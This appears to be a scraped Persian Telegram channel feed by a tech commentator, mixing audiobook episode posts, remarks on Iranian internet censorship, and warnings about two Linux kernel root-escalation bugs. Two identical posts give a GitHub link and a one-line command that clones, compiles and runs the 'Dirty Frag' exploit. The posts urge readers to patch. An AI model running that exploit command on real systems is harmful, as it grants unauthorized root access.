Audio
در سه قسمت بعدی #برای_پیروزی ماجراهای آدم ها رو دنبال می کنیم. از جلمه لئونارد که سعی می کنه از آمریکا خودش رو به چین برسونه و متیو که حالا از زندان چین آزاد شده و دوستش میاد سراغش. در قسمت ۲۴ گپ و گفت های خودم زیاده و می بینین چقدر همه چیز شبیه چیزهای اطراف ما است (:
13❤185👎27💩16👍11🕊4🥰3🍓2👏1
با ذکر بد بودن اینترنت طبقاتی و سانسور و جنگ و ابراز امید برای رسیدن به آزادی و حق انتخاب و مشارکت مردم در سرنوشت، باید بگم که مطلقا هر لینوکسی که دارین رو آپدیت کنین. با این copy.fail می شه روی بسیاری از لینوکس های آپدیت نشده، با یوزر لوکال دسترسی روت گرفت.
55❤424😱86👍52🤔18💔8🙏7😁6🕊5👨💻4🥰3👌2
جادی | Jadi
با ذکر بد بودن اینترنت طبقاتی و سانسور و جنگ و ابراز امید برای رسیدن به آزادی و حق انتخاب و مشارکت مردم در سرنوشت، باید بگم که مطلقا هر لینوکسی که دارین رو آپدیت کنین. با این copy.fail می شه روی بسیاری از لینوکس های آپدیت نشده، با یوزر لوکال دسترسی روت گرفت.
این مساله کپی فیل اینقدر مهم بود که فکر کردم سعی کنم کاملا فنی توضیحش بدم. ویدئو سه تا مفهومی که باعث شدن در ترکیبشون بشه یه یوزر معمولی دسترسی روت بگیره رو توضیح می ده. جالبیش هم اینه که هر سه تا مفهوم، منطقی و معقول هستن ولی ترکیبشون باعث شده بشه چنین حمله ای درست کرد!
https://youtu.be/0GUEoWEDqlo
https://youtu.be/0GUEoWEDqlo
YouTube
نوشتن ۴ بایت روی فایلهای سیستمی که امنیت کرنل لینوکس رو در هم کوبید - توضیح فنی Copy Fail
درسته که من لینوکس رو خیلی دوست دارم ولی وقتی باگ های حاد داره بهترین وقت است برای یه گپ فنی عمیق. چند روز قبل یه باگ لوکال منتشر شد که هر یوزری با داشتن دستوری حداقلی می تونست خودش رو به روت تبدیل کنه. این مشکل ناشی از «یک باگ» نبود بلکه محصول وصل کردن سه…
3❤249👍31👾12😭4😐3🤓3❤🔥2🔥2🥰2🤯2👏1
یه ویدئو گذاشتم و استقبال اینقدر زیاد بود که بر داشتم (: دلیلش این بود که می تونه موجب بسته شدنش بشه یکهو هزار تا فورک و اجرا کردن کد اسپیس. من معمولا به همین خاطر خیلی مستقیم اینجا روشی رو معرفی نمی کنم که ظاهرا استراتژی معقولی بوده. حالا یه فکری می کنم که به کسانی که نرسیده خرد خرد برسه.
و عمیقا به امید روزی که اینهمه آدم معطل این نباشیم که چطوری باید به اینترنتی برسیم که تو دنیای معقول، هر کس از خواب بیدار می شه بی دردسر بهش دسترسی داره.
و عمیقا به امید روزی که اینهمه آدم معطل این نباشیم که چطوری باید به اینترنتی برسیم که تو دنیای معقول، هر کس از خواب بیدار می شه بی دردسر بهش دسترسی داره.
13❤1.06K😢275👍107👎65💩23❤🔥7👏7😁7🤬6🙏6🤝3
دوباره یه مشکل امنیتی حاد در کرنل لینوکس داریم که باهاش هر یوزر لوکال می تونه دسترسی روت بگیره. بهش می گن درتی فرگ.
رپوزیتوری اینجاست:
https://github.com/V4bel/dirtyfrag
و دستوری که دسترسی می ده اینه:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.
توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:
https://youtu.be/DbXWIYpxCVE
آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.
#لینوکس #امنیت
رپوزیتوری اینجاست:
https://github.com/V4bel/dirtyfrag
و دستوری که دسترسی می ده اینه:
git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
که مشخصه یه فایل رو میگیره و کامپایل و اجرا می کنه. این فایل سی، توی یه زنجیره پیش می ره: فایل سو رو لود می کنه، یه پایپ درست می کنه، هر دو رو توی یک فرگمنت از یه پیج نگه می داره و بعد دسترسی نوشتن میگیره و تغییرش می ده و بعد دیگه می شه اجراش کرد.
توی این ویدئو تا حد معقولی با نگاه به کدهای کرنل توضیحش می دم:
https://youtu.be/DbXWIYpxCVE
آپدیت کنین و تکرار کنین که قطع اینترنت چند تا سرور و کامپیوتر شخصی رو در کشور رو ناامن نگه خواهد داشت.
#لینوکس #امنیت
GitHub
GitHub - V4bel/dirtyfrag
Contribute to V4bel/dirtyfrag development by creating an account on GitHub.
2👍192❤122😁17🥴14💔7🔥6👏4🙏4✍2😢2🥰1
ظاهرا اینترنت کمی بازتر شده. امیدوارم بمونه و یادمون باشه که این تازه در بهترین حالت قراره برسه به فیلترنت سابق... به امید آزادی کامل (: ولی حسابی خوش اومدین و همه یادمونه چی شده و چی خواهد شد. وقتی نبودین من فعالیت خاصی نداشتم چون وقتی شما نباشین، همه چیز تا حدی بی معنی است. اگر اینطوری بمونه رادیو رو شروع می کنیم و همه چیزهای دیگه رو ادامه می دیم!
70❤3.06K👍224❤🔥97🤣33🍾33💘31😢22👾21🔥16🥰10🆒9
Audio
شش قسمت بعدی کتاب « #برای_پیروزی ». چون افراد کمتری دنبالش می کنن یه جا می فرستم که کمتر اسپم باشه برای بقیه.
ویدئو ها که توی یوتوب هستن و فید رادیوگیک. رادیو رو هم باید شروع کنم.
کتاب داره به جاهای جالبی می رسه. وی-دونگ به سمت چین می ره با کارت های پیش پرداخت بازی که ارتش جهانی بازیکن ها بتونن عملیاتی که هنوز جزییاتش رو نمی دونیم چیه رو شروع کنن.
در قسمت ۲۹ داستانی بسیار کوتاه می شنویم که احتمالا مرتبطه با عملیات ودر قسمت ۳۰ توضیحات کمی بیشتر از زبان خواهر بزرگ نور و شک های وی-دونگ. این وسط کمی در مورد مفهوم «قرارداد اجتماعی» توضیح می دم که به نظرم بد نیست شنیدنش اگر برای کسی جالبه. این قسمت ۲۹ و بعدش می ریم قسمت ۳۰ و کمی توضیح در موردش. برای کسانی که دوست دارن کتاب های داستانی بخونن که فکرهای عمیقی پشتشه.
https://www.youtube.com/watch?v=xhY9yDVzqyU&feature=youtu.be
ویدئو ها که توی یوتوب هستن و فید رادیوگیک. رادیو رو هم باید شروع کنم.
کتاب داره به جاهای جالبی می رسه. وی-دونگ به سمت چین می ره با کارت های پیش پرداخت بازی که ارتش جهانی بازیکن ها بتونن عملیاتی که هنوز جزییاتش رو نمی دونیم چیه رو شروع کنن.
در قسمت ۲۹ داستانی بسیار کوتاه می شنویم که احتمالا مرتبطه با عملیات ودر قسمت ۳۰ توضیحات کمی بیشتر از زبان خواهر بزرگ نور و شک های وی-دونگ. این وسط کمی در مورد مفهوم «قرارداد اجتماعی» توضیح می دم که به نظرم بد نیست شنیدنش اگر برای کسی جالبه. این قسمت ۲۹ و بعدش می ریم قسمت ۳۰ و کمی توضیح در موردش. برای کسانی که دوست دارن کتاب های داستانی بخونن که فکرهای عمیقی پشتشه.
https://www.youtube.com/watch?v=xhY9yDVzqyU&feature=youtu.be
15❤328👍33💩14🔥9🙏9👎8☃2💋2😈2👌1